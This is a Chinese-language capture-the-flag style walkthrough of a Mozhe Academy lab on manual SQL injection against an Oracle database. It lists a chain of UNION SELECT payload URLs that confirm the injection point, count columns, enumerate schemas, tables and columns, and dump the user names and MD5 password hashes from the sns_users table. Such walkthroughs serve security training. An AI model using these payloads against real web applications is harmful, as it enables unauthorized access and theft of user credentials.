Oracle数据库注入-墨者学院(SQL手工注入漏洞测试(Oracle数据库))

        本期来为大家讲解的sql注入题目是来墨者学院的SQL手工注入漏洞测试(Oracle数据库)。

        地址：http://124.70.22.208:42948/new_list.php?id=1(注意地址已失效仅供参考)

        首先还是先构造payload来检测是否存在注入点

        Payload：“http://124.70.22.208:42948/new_list.php?id=1 and 1=2”

http://124.70.22.208:42948/new_list.php?id=1 and 1=2

 

        发现回显没有显示id=1 的数据，说明id此处存在注入点。

        然后开始爆破字段个数。

        构造payload ：“http://124.70.22.208:42948/new_list.php?id=1 order by 2”

http://124.70.22.208:42948/new_list.php?id=1 order by 2

        Order by是数据库查询的时候对结果进行的排序，如果后面写的是字段，则根据查询字段进行排序，但如果后面写的是数字，该数字大于所查询的字段数，则就会报错，小于的话就不会报错。

 

        注意到“order by 3”的时候没有数据回显，而“order by 2”的时候有数据回显，说明后端查询语句所查询的字段为2。 

        接下来我们先测试这两个字段查询结果的回显位置。

        构造payload：“http://124.70.22.208:42948/new_list.php?id=1 and 1=2 union select '1','2' from dual”

http://124.70.22.208:42948/new_list.php?id=1 and 1=2 union select '1','2' from dual

        其中dual是Oracle中的一个实际存在的表，任何用户均可读取，常用在没有目标表的select语句块中。Oracle中的dual表是一个单行单列的虚拟表。

从回显结果中我们可以看到字段查询结果展示在前端的位置。

        接下来就开始查询数据库

        构造payload：“http://124.70.22.208:42948/new_list.php?id=1 and 1=2 union select (select distinct owner from all_tables where rownum=1),'2' from dual”

http://124.70.22.208:42948/new_list.php?id=1 and 1=2 union select (select distinct owner from all_tables where rownum=1),'2' from dual

        其中all_tables表中的owner字段为数据库名，where rownum=1的意思是只展示一行结果。

        查询SYS以外的其他数据库可以用“http://124.70.22.208:42948/new_list.php?id=1 and 1=2 union select (select distinct owner from all_tables where rownum=1 and owner not in ('SYS')),'2' from dual” 

http://124.70.22.208:42948/new_list.php?id=1 and 1=2 union select (select distinct owner from all_tables where rownum=1 and owner not in ('SYS')),'2' from dual

查询完表之后就是查询表名了

        构造payload：“http://124.70.22.208:42948/new_list.php?id=1 and 1=2 union select (select table_name from user_tables where rownum=1),'2' from dual”此查询结果为当前数据库下的表名。

http://124.70.22.208:42948/new_list.php?id=1 and 1=2 union select (select table_name from user_tables where rownum=1),'2' from dual

user_tables 这张表中存放了所有的表名。

 

查询其他表名时我们也可以用“and table_name not in (‘已查到的表名’)”来查询 。

如：“http://124.70.22.208:42948/new_list.php?id=1 and 1=2 union select (select table_name from user_tables where rownum=1 and table_name not in ('LOGMNR_SESSION_EVOLVE$')),'2' from dual”

http://124.70.22.208:42948/new_list.php?id=1 and 1=2 union select (select table_name from user_tables where rownum=1 and table_name not in ('LOGMNR_SESSION_EVOLVE$')),'2' from dual

              这里我们为了方便，我们直接使用模糊查询来查询user表。

        Payload：“http://124.70.22.208:42948/new_list.php?id=1 and 1=2 union select (select table_name from user_tables where rownum=1 and table_name like '%user%'),'2' from dual”

http://124.70.22.208:42948/new_list.php?id=1 and 1=2 union select (select table_name from user_tables where rownum=1 and table_name like '%user%'),'2' from dual

              使用“table_name not in (‘sns_users’)”来确保是否只有这一张user表。

        Payload：“http://124.70.22.208:42948/new_list.php?id=1 and 1=2 union select (select table_name from user_tables where rownum=1 and table_name like '%user%' and table_name not in ('sns_users')),'2' from dual”

http://124.70.22.208:42948/new_list.php?id=1 and 1=2 union select (select table_name from user_tables where rownum=1 and table_name like '%user%' and table_name not in ('sns_users')),'2' from dual

 

发现没有回显数据，说明只有sns_users 一张user表。

接下来就开始查询字段。

        构造payload：“http://124.70.22.208:42948/new_list.php?id=1 and 1=2 union select (select column_name from all_tab_columns where rownum=1 and table_name='sns_users'),'2' from dual”

http://124.70.22.208:42948/new_list.php?id=1 and 1=2 union select (select column_name from all_tab_columns where rownum=1 and table_name='sns_users'),'2' from dual

all_tab_columns表存放所有的字段名。

        然后使用“and column_name not in (‘USER_NAME’)”来爆出其他字段名

        Payload：“http://124.70.22.208:42948/new_list.php?id=1 and 1=2 union select (select column_name from all_tab_columns where rownum=1 and table_name='sns_users' and column_name not in ('USER_NAME')),'2' from dual”

http://124.70.22.208:42948/new_list.php?id=1 and 1=2 union select (select column_name from all_tab_columns where rownum=1 and table_name='sns_users' and column_name not in ('USER_NAME')),'2' from dual

        这样我们就查询到了存放用户名跟密码的字段名，接下来就是查询数据了。

   构造payload：“http://124.70.22.208:42948/new_list.php?id=1 and 1=2 union select USER_NAME,USER_PWD from "sns_users"”

http://124.70.22.208:42948/new_list.php?id=1 and 1=2 union select USER_NAME,USER_PWD from "sns_users

        注意：小伙伴们一定要记得“sns_users”表名一定加上英文的双引号，应该是Oracle数据库的特性，不然的话不会回显数据！

                    也可以用“where USER_NAME <> 'hu'”来检差除了‘hu’是否还存在其他用户。

        Payload：“http://124.70.22.208:42948/new_list.php?id=1 and 1=2 union select USER_NAME,USER_PWD from "sns_users" where USER_NAME <> 'hu'”

http://124.70.22.208:42948/new_list.php?id=1 and 1=2 union select USER_NAME,USER_PWD from "sns_users" where USER_NAME <> 'hu'

发现还存在mozhe的用户，大家也可以继续尝试。 这里就不再演示了。

        这样最终我们就可以获得数据了，将密码进行MD5解密(md5在线解密破解,md5解密加密)，返回登录页进行登录，划到页面最下端就可以看到KEY了。